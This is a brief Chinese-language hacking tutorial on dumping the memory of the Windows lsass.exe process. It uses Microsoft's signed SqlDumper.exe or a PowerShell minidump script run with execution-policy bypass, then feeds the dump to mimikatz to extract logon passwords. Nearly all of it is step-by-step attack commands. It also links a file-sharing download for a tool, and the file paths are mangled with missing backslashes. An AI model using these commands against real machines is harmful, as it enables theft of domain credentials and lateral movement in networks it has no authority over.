如果目标系统上安装了sql server ,SqlDumper.exe默认存放c:ProgramFilesMicrosoft SQL Server
umberShared,
number对应sqlserver版本
140 for SQL Server 2017
130 for SQL Server 2016
120 for SQL Server 2014
110 for SQL Server 2012
100 for SQL Server 2008
90 for SQL Server 2005
这里域环境为2008,故SqlDumper.exe在这个位置C:Program FilesMicrosoft SQL Server100Shared
对比Procdump尺寸也小了许多
具体实战:
查看lsass.exe 的ProcessID
tasklist /svc |findstr lsass.exe
根据ProcessID来dump 内存文件,Full dump file执行成功后会生产SQLDmpr0001.mdmp文件
Sqldumper.exe ProcessID 0 0x01100
mimikatz加载dump文件
sekurlsa::minidump SQLDmpr0001.mdmp
sekurlsa::logonPasswords full
地址https://mega.nz/#!9whTwbYR!1hx3IoIwNFcD9WubZcr0fYHGud0WR9QhpsS4tHsCCfw
Powershell版procdump
获得lsass.exe的进程ID
tasklist /svc |findstr lsass.exe
dump lsass.exe进程的内存文件
powershell -exec bypass "import-module .Get-ProcessMiniDump.ps1;Get-ProcessMiniDump -ProcID 进程 -Path C:windows askslsass.dmp"
剩下的就是mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full